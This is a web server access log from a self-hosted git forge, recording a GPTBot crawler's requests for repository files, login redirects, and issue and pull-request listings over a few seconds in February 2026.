https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:19:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:19:09:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:19:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:19:09:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:19:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:19:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11283] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:19:09:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:19:09:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:19:09:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:19:09:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:19:09:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:19:09:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:19:09:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:19:09:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:19:09:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 12161] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:19:09:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 969] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:19:09:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:19:09:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:19:09:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=open&type=all" +[17/Feb/2026:19:09:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=open&type=all" +[17/Feb/2026:19:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" +[17/Feb/2026:19:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10145] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:19:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=open&type=all" +[17/Feb/2026:19:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=open&type=all" +[17/Feb/2026:19:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10080] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:10:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:10:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:10:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10074] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:10:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:10:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:10:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:10:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:10:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10079] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:10:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10080] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:10:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10080] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:10:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:10:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:10:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:10:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:10:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:10:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 